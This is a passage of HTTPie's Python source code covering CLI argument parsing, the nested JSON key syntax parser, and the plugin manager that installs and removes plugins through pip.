) credentials.prompt_password(url.netloc) if (credentials.key and credentials.value): plugin.raw_auth = credentials.key + ":" + credentials.value self.args.auth = plugin.get_auth( username=credentials.key, password=credentials.value, ) if not self.args.auth and self.args.ignore_netrc: # Set a no-op auth to force requests to ignore .netrc # <https://github.com/psf/requests/issues/2773#issuecomment-174312831> self.args.auth = ExplicitNullAuth() def _apply_no_options(self, no_options): """For every `--no-OPTION` in `no_options`, set `args.OPTION` to its default value. This allows for un-setting of options, e.g., specified in config. """ invalid = [] for option in no_options: if not option.startswith('--no-'): invalid.append(option) continue # --no-option => --option inverted = '--' + option[5:] for action in self._actions: if inverted in action.option_strings: setattr(self.args, action.dest, action.default) break else: invalid.append(option) if invalid: self.error(f'unrecognized arguments: {" ".join(invalid)}') def _body_from_file(self, fd): """Read the data from a file-like object. Bytes are always read. """ self._ensure_one_data_source(self.args.data, self.args.files) self.args.data = getattr(fd, 'buffer', fd) def _body_from_input(self, data): """Read the data from the CLI. """ self._ensure_one_data_source(self.has_stdin_data, self.args.data, self.args.files) self.args.data = data.encode() def _ensure_one_data_source(self, *other_sources): """There can only be one source of input request data. """ if any(other_sources): self.error('Request body (from stdin, --raw or a file) and request ' 'data (key=value) cannot be mixed. Pass ' '--ignore-stdin to let key/value take priority. ' 'See https://httpie.io/docs#scripting for details.') def _guess_method(self): """Set `args.method` if not specified to either POST or GET based on whether the request has data or not. """ if self.args.method is None: # Invoked as `http URL'. assert not self.args.request_items if self.has_input_data: self.args.method = HTTP_POST else: self.args.method = HTTP_GET # FIXME: False positive, e.g., "localhost" matches but is a valid URL. elif not re.match('^[a-zA-Z]+$', self.args.method): # Invoked as `http URL item+'. The URL is now in `args.method` # and the first ITEM is now incorrectly in `args.url`. try: # Parse the URL as an ITEM and store it as the first ITEM arg. self.args.request_items.insert(0, KeyValueArgType( *SEPARATOR_GROUP_ALL_ITEMS).__call__(self.args.url)) except argparse.ArgumentTypeError as e: if self.args.traceback: raise self.error(e.args[0]) else: # Set the URL correctly self.args.url = self.args.method # Infer the method has_data = ( self.has_input_data or any( item.sep in SEPARATOR_GROUP_DATA_ITEMS for item in self.args.request_items) ) self.args.method = HTTP_POST if has_data else HTTP_GET def _parse_items(self): """ Parse `args.request_items` into `args.headers`, `args.data`, `args.params`, and `args.files`. 
""" try: request_items = RequestItems.from_args( request_item_args=self.args.request_items, request_type=self.args.request_type, ) except ParseError as e: if self.args.traceback: raise self.error(e.args[0]) else: self.args.headers = request_items.headers self.args.data = request_items.data self.args.files = request_items.files self.args.params = request_items.params self.args.multipart_data = request_items.multipart_data if self.args.files and not self.args.form: # `http url @/path/to/file` request_file = None for key, file in self.args.files.items(): if key != '': self.error( 'Invalid file fields (perhaps you meant --form?):' f' {",".join(self.args.files.keys())}') if request_file is not None: self.error("Can't read request from multiple files") request_file = file fn, fd, ct = request_file self.args.files = {} self._body_from_file(fd) if 'Content-Type' not in self.args.headers: content_type = get_content_type(fn) if content_type: self.args.headers['Content-Type'] = content_type def _process_output_options(self): """Apply defaults to output options, or validate the provided ones. The default output options are stdout-type-sensitive. """ def check_options(value, option): unknown = set(value) - OUTPUT_OPTIONS if unknown: self.error(f'Unknown output options: {option}={",".join(unknown)}') if self.args.verbose: self.args.all = True if self.args.output_options is None: if self.args.verbose >= 2: self.args.output_options = ''.join(OUTPUT_OPTIONS) elif self.args.verbose == 1: self.args.output_options = ''.join(BASE_OUTPUT_OPTIONS) elif self.args.offline: self.args.output_options = OUTPUT_OPTIONS_DEFAULT_OFFLINE elif not self.env.stdout_isatty: self.args.output_options = OUTPUT_OPTIONS_DEFAULT_STDOUT_REDIRECTED else: self.args.output_options = OUTPUT_OPTIONS_DEFAULT if self.args.output_options_history is None: self.args.output_options_history = self.args.output_options check_options(self.args.output_options, '--print') check_options(self.args.output_options_history, '--history-print') if self.args.download and OUT_RESP_BODY in self.args.output_options: # Response body is always downloaded with --download and it goes # through a different routine, so we remove it. 
self.args.output_options = str( set(self.args.output_options) - set(OUT_RESP_BODY)) def _process_pretty_options(self): if self.args.prettify == PRETTY_STDOUT_TTY_ONLY: self.args.prettify = PRETTY_MAP[ 'all' if self.env.stdout_isatty else 'none'] elif (self.args.prettify and self.env.is_windows and self.args.output_file): self.error('Only terminal output can be colorized on Windows.') else: # noinspection PyTypeChecker self.args.prettify = PRETTY_MAP[self.args.prettify] def _process_download_options(self): if self.args.offline: self.args.download = False self.args.download_resume = False return if not self.args.download: if self.args.download_resume: self.error('--continue only works with --download') if self.args.download_resume and not ( self.args.download and self.args.output_file): self.error('--continue requires --output to be specified') def _process_format_options(self): format_options = self.args.format_options or [] parsed_options = PARSED_DEFAULT_FORMAT_OPTIONS for options_group in format_options: parsed_options = parse_format_options(options_group, defaults=parsed_options) self.args.format_options = parsed_options def print_manual(self): from httpie.output.ui import man_pages if man_pages.is_available(self.env.program_name): man_pages.display_for(self.env, self.env.program_name) return None text = self.format_help() with self.env.rich_console.pager(): self.env.rich_console.print( text, highlight=False ) def print_usage(self, file): from rich.text import Text from httpie.output.ui import rich_help whitelist = set() _, exception, _ = sys.exc_info() if ( isinstance(exception, argparse.ArgumentError) and len(exception.args) >= 1 and isinstance(exception.args[0], argparse.Action) and exception.args[0].option_strings ): # add_usage path is also taken when you pass an invalid option, # e.g --style=invalid. If something like that happens, we want # to include to action that caused to the invalid usage into # the list of actions we are displaying. whitelist.add(exception.args[0].option_strings[0]) usage_text = Text('usage', style='bold') usage_text.append(':\n ') usage_text.append(rich_help.to_usage(self.spec, whitelist=whitelist)) self.env.rich_error_console.print(usage_text) def error(self, message): """Prints a usage message incorporating the message to stderr and exits.""" self.print_usage(sys.stderr) self.env.rich_error_console.print( dedent( f''' [bold]error[/bold]: {message} [bold]for more information[/bold]: run '{self.prog} --help' or visit https://httpie.io/docs/cli '''.rstrip() ) ) self.exit(2) File: httpie/cli/dicts.py from collections import OrderedDict from multidict import MultiDict, CIMultiDict class BaseMultiDict(MultiDict): """ Base class for all MultiDicts. """ class HTTPHeadersDict(CIMultiDict, BaseMultiDict): """ Headers are case-insensitive and multiple values are supported through the `add()` API. """ def add(self, key, value): """ Add or update a new header. If the given `value` is `None`, then all the previous values will be overwritten and the value will be set to `None`. """ if value is None: self[key] = value return None # If the previous value for the given header is `None` # then discard it since we are explicitly giving a new # value for it. if key in self and self.getone(key) is None: self.popone(key) super().add(key, value) def remove_item(self, key, value): """ Remove a (key, value) pair from the dict. 
""" existing_values = self.popall(key) existing_values.remove(value) for value in existing_values: self.add(key, value) class RequestJSONDataDict(OrderedDict): pass class MultiValueOrderedDict(OrderedDict): """Multi-value dict for URL parameters and form data.""" def __setitem__(self, key, value): """ If `key` is assigned more than once, `self[key]` holds a `list` of all the values. This allows having multiple fields with the same name in form data and URL params. """ assert not isinstance(value, list) if key not in self: super().__setitem__(key, value) else: if not isinstance(self[key], list): super().__setitem__(key, [self[key]]) self[key].append(value) def items(self): for key, values in super().items(): if not isinstance(values, list): values = [values] for value in values: yield key, value class RequestQueryParamsDict(MultiValueOrderedDict): pass class RequestDataDict(MultiValueOrderedDict): pass class MultipartRequestDataDict(MultiValueOrderedDict): pass class RequestFilesDict(RequestDataDict): pass File: httpie/cli/nested_json/interpret.py from typing import Type, Union, Any, Iterable, Tuple from .parse import parse, assert_cant_happen from .errors import NestedJSONSyntaxError from .tokens import EMPTY_STRING, TokenKind, Token, PathAction, Path, NestedJSONArray __all__ = [ 'interpret_nested_json', 'unwrap_top_level_list_if_needed', ] JSONType = Type[Union[dict, list, int, float, str]] JSON_TYPE_MAPPING = { dict: 'object', list: 'array', int: 'number', float: 'number', str: 'string', } def interpret_nested_json(pairs: Iterable[Tuple[str, str]]) -> dict: context = None for key, value in pairs: context = interpret(context, key, value) return wrap_with_dict(context) def interpret(context: Any, key: str, value: Any) -> Any: cursor = context paths = list(parse(key)) paths.append(Path(PathAction.SET, value)) # noinspection PyShadowingNames def type_check(index: int, path: Path, expected_type: JSONType): if not isinstance(cursor, expected_type): if path.tokens: pseudo_token = Token( kind=TokenKind.PSEUDO, value='', start=path.tokens[0].start, end=path.tokens[-1].end, ) else: pseudo_token = None cursor_type = JSON_TYPE_MAPPING.get(type(cursor), type(cursor).__name__) required_type = JSON_TYPE_MAPPING[expected_type] message = f'Cannot perform {path.kind.to_string()!r} based access on ' message += repr(''.join(path.reconstruct() for path in paths[:index])) message += f' which has a type of {cursor_type!r} but this operation' message += f' requires a type of {required_type!r}.' raise NestedJSONSyntaxError( source=key, token=pseudo_token, message=message, message_kind='Type', ) def object_for(kind: PathAction) -> Any: if kind is PathAction.KEY: return {} elif kind in {PathAction.INDEX, PathAction.APPEND}: return [] else: assert_cant_happen() for index, (path, next_path) in enumerate(zip(paths, paths[1:])): # If there is no context yet, set it. 
if cursor is None: context = cursor = object_for(path.kind) if path.kind is PathAction.KEY: type_check(index, path, dict) if next_path.kind is PathAction.SET: cursor[path.accessor] = next_path.accessor break cursor = cursor.setdefault(path.accessor, object_for(next_path.kind)) elif path.kind is PathAction.INDEX: type_check(index, path, list) if path.accessor < 0: raise NestedJSONSyntaxError( source=key, token=path.tokens[1], message='Negative indexes are not supported.', message_kind='Value', ) cursor.extend([None] * (path.accessor - len(cursor) + 1)) if next_path.kind is PathAction.SET: cursor[path.accessor] = next_path.accessor break if cursor[path.accessor] is None: cursor[path.accessor] = object_for(next_path.kind) cursor = cursor[path.accessor] elif path.kind is PathAction.APPEND: type_check(index, path, list) if next_path.kind is PathAction.SET: cursor.append(next_path.accessor) break cursor.append(object_for(next_path.kind)) cursor = cursor[-1] else: assert_cant_happen() return context def wrap_with_dict(context): if context is None: return {} elif isinstance(context, list): return { EMPTY_STRING: NestedJSONArray(context), } else: assert isinstance(context, dict) return context def unwrap_top_level_list_if_needed(data: dict): """ Propagate the top-level list, if that’s what we got. """ if len(data) == 1: key, value = list(data.items())[0] if isinstance(value, NestedJSONArray): assert key == EMPTY_STRING return value return data File: httpie/cli/nested_json/__init__.py """ A library for parsing the HTTPie nested JSON key syntax and constructing the resulting objects. <https://httpie.io/docs/cli/nested-json> It has no dependencies. """ from .interpret import interpret_nested_json, unwrap_top_level_list_if_needed from .errors import NestedJSONSyntaxError from .tokens import EMPTY_STRING, NestedJSONArray __all__ = [ 'interpret_nested_json', 'unwrap_top_level_list_if_needed', 'EMPTY_STRING', 'NestedJSONArray', 'NestedJSONSyntaxError' ] File: httpie/cli/nested_json/tokens.py from enum import Enum, auto from typing import NamedTuple, Union, Optional, List EMPTY_STRING = '' HIGHLIGHTER = '^' OPEN_BRACKET = '[' CLOSE_BRACKET = ']' BACKSLASH = '\\' class TokenKind(Enum): TEXT = auto() NUMBER = auto() LEFT_BRACKET = auto() RIGHT_BRACKET = auto() PSEUDO = auto() # Not a real token, use when representing location only. 
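    # Rough illustration of how these kinds are produced by the tokenizer in
    # parse.py: the key `foo[0]` becomes
    #   Token(TEXT, 'foo', 0, 3), Token(LEFT_BRACKET, '[', 3, 4),
    #   Token(NUMBER, 0, 4, 5), Token(RIGHT_BRACKET, ']', 5, 6)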
def to_name(self) -> str: for key, value in OPERATORS.items(): if value is self: return repr(key) else: return 'a ' + self.name.lower() OPERATORS = { OPEN_BRACKET: TokenKind.LEFT_BRACKET, CLOSE_BRACKET: TokenKind.RIGHT_BRACKET, } SPECIAL_CHARS = OPERATORS.keys() | {BACKSLASH} LITERAL_TOKENS = [ TokenKind.TEXT, TokenKind.NUMBER, ] class Token(NamedTuple): kind: TokenKind value: Union[str, int] start: int end: int class PathAction(Enum): KEY = auto() INDEX = auto() APPEND = auto() # Pseudo action, used by the interpreter SET = auto() def to_string(self) -> str: return self.name.lower() class Path: def __init__( self, kind: PathAction, accessor: Optional[Union[str, int]] = None, tokens: Optional[List[Token]] = None, is_root: bool = False, ): self.kind = kind self.accessor = accessor self.tokens = tokens or [] self.is_root = is_root def reconstruct(self) -> str: if self.kind is PathAction.KEY: if self.is_root: return str(self.accessor) return OPEN_BRACKET + self.accessor + CLOSE_BRACKET elif self.kind is PathAction.INDEX: return OPEN_BRACKET + str(self.accessor) + CLOSE_BRACKET elif self.kind is PathAction.APPEND: return OPEN_BRACKET + CLOSE_BRACKET class NestedJSONArray(list): """Denotes a top-level JSON array.""" File: httpie/cli/nested_json/errors.py from typing import Optional from .tokens import Token, HIGHLIGHTER class NestedJSONSyntaxError(ValueError): def __init__( self, source: str, token: Optional[Token], message: str, message_kind: str = 'Syntax', ) -> None: self.source = source self.token = token self.message = message self.message_kind = message_kind def __str__(self): lines = [f'HTTPie {self.message_kind} Error: {self.message}'] if self.token is not None: lines.append(self.source) lines.append( ' ' * self.token.start + HIGHLIGHTER * (self.token.end - self.token.start) ) return '\n'.join(lines) File: httpie/cli/nested_json/parse.py from typing import Iterator from .errors import NestedJSONSyntaxError from .tokens import ( EMPTY_STRING, BACKSLASH, TokenKind, OPERATORS, SPECIAL_CHARS, LITERAL_TOKENS, Token, PathAction, Path, ) __all__ = [ 'parse', 'assert_cant_happen', ] def parse(source: str) -> Iterator[Path]: """ start: root_path path* root_path: (literal | index_path | append_path) literal: TEXT | NUMBER path: key_path | index_path | append_path key_path: LEFT_BRACKET TEXT RIGHT_BRACKET index_path: LEFT_BRACKET NUMBER RIGHT_BRACKET append_path: LEFT_BRACKET RIGHT_BRACKET """ tokens = list(tokenize(source)) cursor = 0 def can_advance(): return cursor < len(tokens) # noinspection PyShadowingNames def expect(*kinds): nonlocal cursor assert kinds if can_advance(): token = tokens[cursor] cursor += 1 if token.kind in kinds: return token elif tokens: token = tokens[-1]._replace( start=tokens[-1].end + 0, end=tokens[-1].end + 1, ) else: token = None if len(kinds) == 1: suffix = kinds[0].to_name() else: suffix = ', '.join(kind.to_name() for kind in kinds[:-1]) suffix += ' or ' + kinds[-1].to_name() message = f'Expecting {suffix}' raise NestedJSONSyntaxError(source, token, message) # noinspection PyShadowingNames def parse_root(): tokens = [] if not can_advance(): return Path( kind=PathAction.KEY, accessor=EMPTY_STRING, is_root=True ) # (literal | index_path | append_path)? 
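        # Illustration (sketch, not executed): for the source `foo[0][bar][]`,
        # parse() yields, in order,
        #   Path(KEY, 'foo', is_root=True), Path(INDEX, 0),
        #   Path(KEY, 'bar'), Path(APPEND)
        # which interpret.py then materializes as {'foo': [{'bar': [<value>]}]}.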
token = expect(*LITERAL_TOKENS, TokenKind.LEFT_BRACKET) tokens.append(token) if token.kind in LITERAL_TOKENS: action = PathAction.KEY value = str(token.value) elif token.kind is TokenKind.LEFT_BRACKET: token = expect(TokenKind.NUMBER, TokenKind.RIGHT_BRACKET) tokens.append(token) if token.kind is TokenKind.NUMBER: action = PathAction.INDEX value = token.value tokens.append(expect(TokenKind.RIGHT_BRACKET)) elif token.kind is TokenKind.RIGHT_BRACKET: action = PathAction.APPEND value = None else: assert_cant_happen() else: assert_cant_happen() # noinspection PyUnboundLocalVariable return Path( kind=action, accessor=value, tokens=tokens, is_root=True ) yield parse_root() # path* while can_advance(): path_tokens = [expect(TokenKind.LEFT_BRACKET)] token = expect(TokenKind.TEXT, TokenKind.NUMBER, TokenKind.RIGHT_BRACKET) path_tokens.append(token) if token.kind is TokenKind.RIGHT_BRACKET: path = Path(PathAction.APPEND, tokens=path_tokens) elif token.kind is TokenKind.TEXT: path = Path(PathAction.KEY, token.value, tokens=path_tokens) path_tokens.append(expect(TokenKind.RIGHT_BRACKET)) elif token.kind is TokenKind.NUMBER: path = Path(PathAction.INDEX, token.value, tokens=path_tokens) path_tokens.append(expect(TokenKind.RIGHT_BRACKET)) else: assert_cant_happen() # noinspection PyUnboundLocalVariable yield path def tokenize(source: str) -> Iterator[Token]: cursor = 0 backslashes = 0 buffer = [] def send_buffer() -> Iterator[Token]: nonlocal backslashes if not buffer: return None value = ''.join(buffer) kind = TokenKind.TEXT if not backslashes: for variation, kind in [ (int, TokenKind.NUMBER), (check_escaped_int, TokenKind.TEXT), ]: try: value = variation(value) except ValueError: continue else: break yield Token( kind=kind, value=value, start=cursor - (len(buffer) + backslashes), end=cursor, ) buffer.clear() backslashes = 0 def can_advance() -> bool: return cursor < len(source) while can_advance(): index = source[cursor] if index in OPERATORS: yield from send_buffer() yield Token(OPERATORS[index], index, cursor, cursor + 1) elif index == BACKSLASH and can_advance(): if source[cursor + 1] in SPECIAL_CHARS: backslashes += 1 else: buffer.append(index) buffer.append(source[cursor + 1]) cursor += 1 else: buffer.append(index) cursor += 1 yield from send_buffer() def check_escaped_int(value: str) -> str: if not value.startswith(BACKSLASH): raise ValueError('Not an escaped int') try: int(value[1:]) except ValueError as exc: raise ValueError('Not an escaped int') from exc else: return value[1:] def assert_cant_happen(): raise ValueError('Unexpected value') File: httpie/manager/compat.py import sys import shutil import subprocess from contextlib import suppress from typing import List, Optional from httpie.compat import is_frozen class PipError(Exception): """An exception that occurs when pip exits with an error status code.""" def __init__(self, stdout, stderr): self.stdout = stdout self.stderr = stderr def _discover_system_pip() -> List[str]: # When we are running inside of a frozen binary, we need the system # pip to install plugins since there is no way for us to execute any # code outside of the HTTPie. # # We explicitly depend on system pip, so the SystemError should not # be executed (except for broken installations). 
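    # Usage sketch (assumption, mirroring run_pip() below): in a frozen binary,
    # `run_pip(['install', 'some-plugin'])` resolves to something like
    # `pip3 install some-plugin` using the system pip discovered here, whereas
    # in a regular installation it becomes `<sys.executable> -m pip install some-plugin`.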
def _check_pip_version(pip_location: Optional[str]) -> bool: if not pip_location: return False with suppress(subprocess.CalledProcessError): stdout = subprocess.check_output([pip_location, "--version"], text=True) return "python 3" in stdout targets = [ "pip", "pip3" ] for target in targets: pip_location = shutil.which(target) if _check_pip_version(pip_location): return pip_location raise SystemError("Couldn't find 'pip' executable. Please ensure that pip in your system is available.") def _run_pip_subprocess(pip_executable: List[str], args: List[str]) -> bytes: cmd = [*pip_executable, *args] try: process = subprocess.run( cmd, check=True, shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE ) except subprocess.CalledProcessError as error: raise PipError(error.stdout, error.stderr) from error else: return process.stdout def run_pip(args: List[str]) -> bytes: if is_frozen: pip_executable = [_discover_system_pip()] else: pip_executable = [sys.executable, '-m', 'pip'] return _run_pip_subprocess(pip_executable, args) File: httpie/manager/__init__.py File: httpie/manager/core.py import argparse from typing import Optional from httpie.context import Environment from httpie.status import ExitStatus from httpie.manager.cli import missing_subcommand, parser from httpie.manager.tasks import CLI_TASKS MSG_COMMAND_CONFUSION = '''\ This command is only for managing HTTPie plugins. To send a request, please use the http/https commands: $ http {args} $ https {args} ''' # noinspection PyStringFormat MSG_NAKED_INVOCATION = f'''\ {missing_subcommand()} {MSG_COMMAND_CONFUSION} '''.rstrip("\n").format(args='POST pie.dev/post hello=world') def dispatch_cli_task(env: Environment, action: Optional[str], args: argparse.Namespace) -> ExitStatus: if action is None: parser.error(missing_subcommand('cli')) return CLI_TASKS[action](env, args) def program(args: argparse.Namespace, env: Environment) -> ExitStatus: if args.action is None: parser.error(MSG_NAKED_INVOCATION) if args.action == 'plugins': return dispatch_cli_task(env, args.action, args) elif args.action == 'cli': return dispatch_cli_task(env, args.cli_action, args) return ExitStatus.SUCCESS File: httpie/manager/cli.py from textwrap import dedent from httpie.cli.argparser import HTTPieManagerArgumentParser from httpie.cli.options import Qualifiers, ARGPARSE_QUALIFIER_MAP, map_qualifiers, parser_to_parser_spec from httpie import __version__ CLI_SESSION_UPGRADE_FLAGS = [ { 'flags': ['--bind-cookies'], 'action': 'store_true', 'default': False, 'help': 'Bind domainless cookies to the host that session belongs.' } ] COMMANDS = { 'cli': { 'help': 'Manage HTTPie for Terminal', 'export-args': [ 'Export available options for the CLI', { 'flags': ['-f', '--format'], 'choices': ['json'], 'help': 'Format to export in.', 'default': 'json' } ], 'check-updates': [ 'Check for updates' ], 'sessions': { 'help': 'Manage HTTPie sessions', 'upgrade': [ 'Upgrade the given HTTPie session with the latest ' 'layout. A list of changes between different session versions ' 'can be found in the official documentation.', { 'dest': 'hostname', 'metavar': 'HOSTNAME', 'help': 'The host this session belongs.' }, { 'dest': 'session', 'metavar': 'SESSION_NAME_OR_PATH', 'help': 'The name or the path for the session that will be upgraded.' }, *CLI_SESSION_UPGRADE_FLAGS ], 'upgrade-all': [ 'Upgrade all named sessions with the latest layout. 
A list of '
            'changes between different session versions can be found in the official '
            'documentation.',
            *CLI_SESSION_UPGRADE_FLAGS
        ],
    }
}

COMMANDS['plugins'] = COMMANDS['cli']['plugins'] = {
    'help': 'Manage HTTPie plugins.',
    'install': [
        'Install the given targets from PyPI '
        'or from local paths.',
        {
            'dest': 'targets',
            'metavar': 'TARGET',
            'nargs': Qualifiers.ONE_OR_MORE,
            'help': 'targets to install'
        }
    ],
    'upgrade': [
        'Upgrade the given plugins.',
        {
            'dest': 'targets',
            'metavar': 'TARGET',
            'nargs': Qualifiers.ONE_OR_MORE,
            'help': 'targets to upgrade'
        }
    ],
    'uninstall': [
        'Uninstall the given HTTPie plugins.',
        {
            'dest': 'targets',
            'metavar': 'TARGET',
            'nargs': Qualifiers.ONE_OR_MORE,
            'help': 'targets to uninstall'
        }
    ],
    'list': [
        'List all installed HTTPie plugins.'
    ],
}


def missing_subcommand(*args) -> str:
    base = COMMANDS
    for arg in args:
        base = base[arg]

    assert isinstance(base, dict)
    subcommands = ', '.join(map(repr, base.keys()))
    return f'Please specify one of these: {subcommands}'


def generate_subparsers(root, parent_parser, definitions, spec):
    action_dest = '_'.join(parent_parser.prog.split()[1:] + ['action'])
    actions = parent_parser.add_subparsers(
        dest=action_dest
    )
    for command, properties in definitions.items():
        is_subparser = isinstance(properties, dict)
        properties = properties.copy()

        descr = properties.pop('help', None) if is_subparser else properties.pop(0)
        command_parser = actions.add_parser(command, description=descr)
        command_parser.root = root
        if is_subparser:
            generate_subparsers(root, command_parser, properties, spec)
            continue

        group = spec.add_group(parent_parser.prog + ' ' + command, description=descr)
        for argument in properties:
            argument = argument.copy()
            flags = argument.pop('flags', [])
            command_parser.add_argument(*flags, **map_qualifiers(argument, ARGPARSE_QUALIFIER_MAP))
            group.add_argument(*flags, **argument)


parser = HTTPieManagerArgumentParser(
    prog='httpie',
    description=dedent(
        '''
        Management interface for HTTPie itself. <https://httpie.io/docs#manager>

        Be aware that you might be looking for the http/https commands for sending
        HTTP requests. This command is only available for managing HTTPie plugins
        and the configuration around it.
        '''
    ),
)
parser.add_argument(
    '--debug',
    action='store_true',
    default=False,
    help='''
    Prints the exception traceback should one occur, as well as other
    information useful for debugging HTTPie itself and for reporting bugs.
    '''
)
parser.add_argument(
    '--traceback',
    action='store_true',
    default=False,
    help='''
    Prints the exception traceback should one occur.
    '''
)
parser.add_argument(
    '--version',
    action='version',
    version=__version__,
    help='''
    Show version and exit.
''' ) man_page_hint = ''' If you are looking for the man pages of http/https commands, try one of the following: $ man http $ man https ''' options = parser_to_parser_spec(parser, man_page_hint=man_page_hint, source_file=__file__) generate_subparsers(parser, parser, COMMANDS, options) File: httpie/manager/__main__.py import argparse import sys from typing import List, Union from httpie.context import Environment from httpie.status import ExitStatus from httpie.manager.cli import parser from httpie.manager.core import MSG_COMMAND_CONFUSION, program as main_program def is_http_command(args: List[Union[str, bytes]], env: Environment) -> bool: """Check whether http/https parser can parse the arguments.""" from httpie.cli.definition import parser as http_parser from httpie.manager.cli import COMMANDS # If the user already selected a top-level sub-command, never # show the http/https version. E.g httpie plugins pie.dev/post if len(args) >= 1 and args[0] in COMMANDS: return False with env.as_silent(): try: http_parser.parse_args(env=env, args=args) except (Exception, SystemExit): return False else: return True def main(args: List[Union[str, bytes]] = sys.argv, env: Environment = Environment()) -> ExitStatus: from httpie.core import raw_main try: return raw_main( parser=parser, main_program=main_program, args=args, env=env, use_default_options=False, ) except argparse.ArgumentError: program_args = args[1:] if is_http_command(program_args, env): env.stderr.write(MSG_COMMAND_CONFUSION.format(args=' '.join(program_args)) + "\n") return ExitStatus.ERROR def program(): try: exit_status = main() except KeyboardInterrupt: exit_status = ExitStatus.ERROR_CTRL_C return exit_status if __name__ == '__main__': # pragma: nocover sys.exit(program()) File: httpie/manager/tasks/plugins.py import argparse import os import textwrap import re import shutil from collections import defaultdict from contextlib import suppress from pathlib import Path from typing import List, Optional, Tuple from httpie.manager.compat import PipError, run_pip from httpie.manager.cli import parser, missing_subcommand from httpie.compat import get_dist_name, importlib_metadata from httpie.context import Environment from httpie.status import ExitStatus from httpie.utils import get_site_paths PEP_503 = re.compile(r"[-_.]+") class PluginInstaller: def __init__(self, env: Environment, debug: bool = False) -> None: self.env = env self.dir = env.config.plugins_dir self.debug = debug self.setup_plugins_dir() def setup_plugins_dir(self) -> None: try: self.dir.mkdir( exist_ok=True, parents=True ) except OSError: self.env.stderr.write( f'Couldn\'t create "{self.dir!s}"' ' directory for plugin installation.' ' Please re-check the permissions for that directory,' ' and if needed, allow write-access.' 
) raise def fail( self, command: str, target: Optional[str] = None, reason: Optional[str] = None ) -> ExitStatus: message = f'Can\'t {command}' if target: message += f' {target!r}' if reason: message += f': {reason}' self.env.stderr.write(message + '\n') return ExitStatus.ERROR def _install(self, targets: List[str], mode='install') -> Tuple[ bytes, ExitStatus ]: pip_args = [ 'install', '--prefer-binary', f'--prefix={self.dir}', '--no-warn-script-location', ] if mode == 'upgrade': pip_args.append('--upgrade') pip_args.extend(targets) try: stdout = run_pip(pip_args) except PipError as pip_error: error = pip_error stdout = pip_error.stdout else: error = None self.env.stdout.write(stdout.decode()) if error: reason = None if error.stderr: stderr = error.stderr.decode() if self.debug: self.env.stderr.write('Command failed: ') self.env.stderr.write('pip ' + ' '.join(pip_args) + '\n') self.env.stderr.write(textwrap.indent(' ', stderr)) last_line = stderr.strip().splitlines()[-1] severity, _, message = last_line.partition(': ') if severity == 'ERROR': reason = message stdout = error.stdout exit_status = self.fail(mode, ', '.join(targets), reason) else: exit_status = ExitStatus.SUCCESS return stdout, exit_status def install(self, targets: List[str]) -> ExitStatus: self.env.stdout.write(f"Installing {', '.join(targets)}...\n") self.env.stdout.flush() _, exit_status = self._install(targets) return exit_status def _clear_metadata(self, targets: List[str]) -> None: # Due to an outstanding pip problem[0], we have to get rid of # existing metadata for old versions manually. # [0]: https://github.com/pypa/pip/issues/10727 result_deps = defaultdict(list) for site_dir in get_site_paths(self.dir): for child in site_dir.iterdir(): if child.suffix in {'.dist-info', '.egg-info'}: name, _, version = child.stem.rpartition('-') result_deps[name].append((version, child)) for target in targets: name, _, version = target.rpartition('-') name = PEP_503.sub("-", name).lower().replace('-', '_') if name not in result_deps: continue for result_version, meta_path in result_deps[name]: if version != result_version: shutil.rmtree(meta_path) def upgrade(self, targets: List[str]) -> ExitStatus: self.env.stdout.write(f"Upgrading {', '.join(targets)}...\n") self.env.stdout.flush() raw_stdout, exit_status = self._install( targets, mode='upgrade' ) if not raw_stdout: return exit_status stdout = raw_stdout.decode() installation_line = stdout.splitlines()[-1] if installation_line.startswith('Successfully installed'): self._clear_metadata(installation_line.split()[2:]) def _uninstall(self, target: str) -> Optional[ExitStatus]: try: distribution = importlib_metadata.distribution(target) except importlib_metadata.PackageNotFoundError: return self.fail('uninstall', target, 'package is not installed') base_dir = Path(distribution.locate_file('.')).resolve() if self.dir not in base_dir.parents: # If the package is installed somewhere else (e.g on the site packages # of the real python interpreter), than that means this package is not # installed through us. return self.fail('uninstall', target, 'package is not installed through httpie plugins' ' interface') files = distribution.files if files is None: return self.fail('uninstall', target, 'couldn\'t locate the package') # TODO: Consider handling failures here (e.g if it fails, # just revert the operation and leave the site-packages # in a proper shape). 
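        # Removal sketch (descriptive): each file recorded in the package
        # metadata (`distribution.files`) is unlinked relative to its install
        # location, and the leftover *.dist-info directory is pruned below if
        # it ends up empty.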
for file in files: with suppress(FileNotFoundError): os.unlink(distribution.locate_file(file)) metadata_path = getattr(distribution, '_path', None) if ( metadata_path and metadata_path.exists() and not any(metadata_path.iterdir()) ): metadata_path.rmdir() self.env.stdout.write(f'Successfully uninstalled {target}\n') def uninstall(self, targets: List[str]) -> ExitStatus: # Unfortunately uninstall doesn't work with custom pip schemes. See: # - https://github.com/pypa/pip/issues/5595 # - https://github.com/pypa/pip/issues/4575 # so we have to implement our own uninstalling logic. Which works # on top of the importlib_metadata. exit_code = ExitStatus.SUCCESS for target in targets: exit_code |= self._uninstall(target) or ExitStatus.SUCCESS return ExitStatus(exit_code) def list(self) -> None: from httpie.plugins.registry import plugin_manager known_plugins = defaultdict(list) for entry_point in plugin_manager.iter_entry_points(self.dir): ep_info = (entry_point.group, entry_point.name) ep_name = get_dist_name(entry_point) or entry_point.module known_plugins[ep_name].append(ep_info) for plugin, entry_points in known_plugins.items(): self.env.stdout.write(plugin) version = importlib_metadata.version(plugin) if version is not None: self.env.stdout.write(f' ({version})') self.env.stdout.write('\n') for group, entry_point in sorted(entry_points): self.env.stdout.write(f' {entry_point} ({group})\n') def run( self, action: Optional[str], args: argparse.Namespace, ) -> ExitStatus: from httpie.plugins.manager import enable_plugins if action is None: parser.error(missing_subcommand('plugins')) with enable_plugins(self.dir): if action == 'install': status = self.install(args.targets) elif action == 'upgrade': status = self.upgrade(args.targets) elif action == 'uninstall': status = self.uninstall(args.targets) elif action == 'list': status = self.list() return status or ExitStatus.SUCCESS def cli_plugins(env: Environment, args: argparse.Namespace) -> ExitStatus: plugins = PluginInstaller(env, debug=args.debug) try: action = args.cli_plugins_action except AttributeError: action = args.plugins_action return plugins.run(action, args) File: httpie/manager/tasks/sessions.py import argparse from httpie.sessions import SESSIONS_DIR_NAME, get_httpie_session from httpie.status import ExitStatus from httpie.context import Environment from httpie.legacy import v3_1_0_session_cookie_format, v3_2_0_session_header_format from httpie.manager.cli import missing_subcommand, parser from httpie.utils import is_version_greater FIXERS_TO_VERSIONS = { '3.1.0': v3_1_0_session_cookie_format.fix_layout, '3.2.0': 